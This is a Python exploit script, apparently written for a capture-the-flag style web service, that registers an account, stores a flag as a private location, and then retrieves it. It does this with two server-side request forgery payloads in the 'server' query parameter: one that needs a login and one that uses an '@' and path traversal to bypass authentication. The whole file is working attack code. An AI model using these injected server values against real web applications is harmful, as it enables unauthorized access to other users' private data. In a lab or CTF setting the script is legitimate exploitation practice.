exploit.py

#!/usr/bin/env python3
import requests
import json
import random
import string
import re
from typing import Tuple

IP = "http://127.0.0.1:4241"

def register(uname, pw):
    url = IP+'/register'
    form_data = {'agent_alias': uname, 'password': pw}
    r = requests.post(url, data=form_data)

    if "Registered new agent" in r.text:
        return True
    else:
        return False

def login(uname, pw) -> Tuple[bool, str, str]:
    s = requests.Session()
    url = IP+'/login'
    form_data = {'agent_alias': uname, 'password': pw}
    r = s.post(url, data=form_data)

    if s.cookies.get('session') == None:
        return (False, None, None)

    uid = re.findall(r"id=\"agent-id\" title=\"([0-9a-f\-]{36})\"", r.text)
    if len(uid) != 1:
        return (False, None, None)
    return (True, s, uid[0])

# ----- Store secret -----
SECRET = "FLAG_123"

uname = "".join(random.choices(string.ascii_letters, k=8))
pw = "".join(random.choices(string.ascii_letters, k=8))
print(f"uname: {uname}, pw: {pw}")

assert register(uname, pw) is True
(success, s, uid) = login(uname, pw)
assert success is True

url = IP+'/api/location/add'
json_data = {"tag": SECRET,
             "lat": 2,
             "lon": 3}
form_data = {'jsonData': json.dumps(json_data),
             'server': "private_loc"}
r = s.post(url, data=form_data)


# EXPLOITS
UID = uid
print(f"uid: {UID}")

# ----- Exploit #1 login needed -----
register("exploit", "pw")
(_, s, _) = login("exploit", "pw")

url = IP + "/api/locations?server="
exploit = f"private_loc:4242/location/{UID}?comment="
url = url + exploit
r = s.get(url)
print("login exploit: " + r.text)

# ----- Exploit #2 no login needed -----
url = IP + "/api/locations?server="
exploit = f"private_loc:4242\@public_loc:4242/../../location/{UID}?comment="
url = url + exploit
r = requests.get(url)
print("no login exploit: " + r.text)